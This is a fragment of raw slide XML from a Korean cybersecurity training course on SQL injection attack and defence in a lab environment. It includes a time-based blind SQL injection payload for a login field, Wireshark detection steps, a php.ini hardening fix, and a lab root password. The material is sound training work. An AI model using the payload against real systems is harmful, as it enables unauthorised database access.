              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>http://web.navy.mil.kr/webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>admin' and if((select substring(database(),2,1)='w'),sleep(5),1) and ''=''#'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 입력</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>위의 구문에서 ‘는 모두 작은따옴표이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.) </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>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rPr>
                        <a:t>] </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격 </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rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t> injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>공격은 </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>피해 웹 서버의 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/var/www/html/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>webhack</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>member_login_check.php</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>에서 적용되어 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>DB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>를 통한 공격이다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>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rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>member_login_check.php</a:t>
                      </a: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a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>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rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>참고 사이트</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>:http://hackerschool.org/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>Sub_Html</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>HS_Posting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>uid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>=43&gt;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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패스워드 입력창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>hack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</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5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>터미널 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>acheck</a:t>
            </a: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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생 화면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>  (id: root  PW: root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>학생들은 각자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 바탕화면에 터미널 실행 한 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>setup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>관리자 화면에서 왼쪽 ‘교관 공격‘ 탭 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격하고자 하는 해당 문제번호와 할당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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2. ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Web/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 1. SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>유형</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ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/Environ/HackerSchool</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>HackerSchool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>해커스쿨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>이미지 파일  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -&gt; download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>압축 해제</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>두개의 파일이 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ftz.iso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, Vmware_Redhat_9_FTZ.Zip  -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>압축 해제</a:t>
            </a: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압축을 풀면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, Red Hat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Linux.vmx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일이 있음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해당 파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>더블클릭하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 실행한다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VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 처음 사용한다면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>‘Use VMware Workstation 16 Player for free for non-commercial use’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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웹 서버에서         아이콘 클릭</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err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 이용하여 악의적인 행위를 하는 패킷 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속한 웹 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 들어오는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>http </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷들 중 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>webhack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/member/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>member_login_check.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>정보로 들어오는 패킷들을 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷에 오른쪽 마우스 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭 하여 패킷의 상세한 내용을 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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Follow TCP Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>내용에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>user_pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>정보에 일반적인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>와 같은 형태가 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>"select" "if“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>와 같은 쿼리문이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>껴있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 것을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(%27, %28 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>등은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>공격 문에 들어 있는 특수문자 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>]  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>웹 서버 홈페이지에서 터미널 아이콘 클릭 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/php.ini</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2. httpd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서비스 재시작 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service httpd restart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>󰏮</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>mysqld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> restart</a:t>
            </a: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a:t>1.  # check </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Web/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
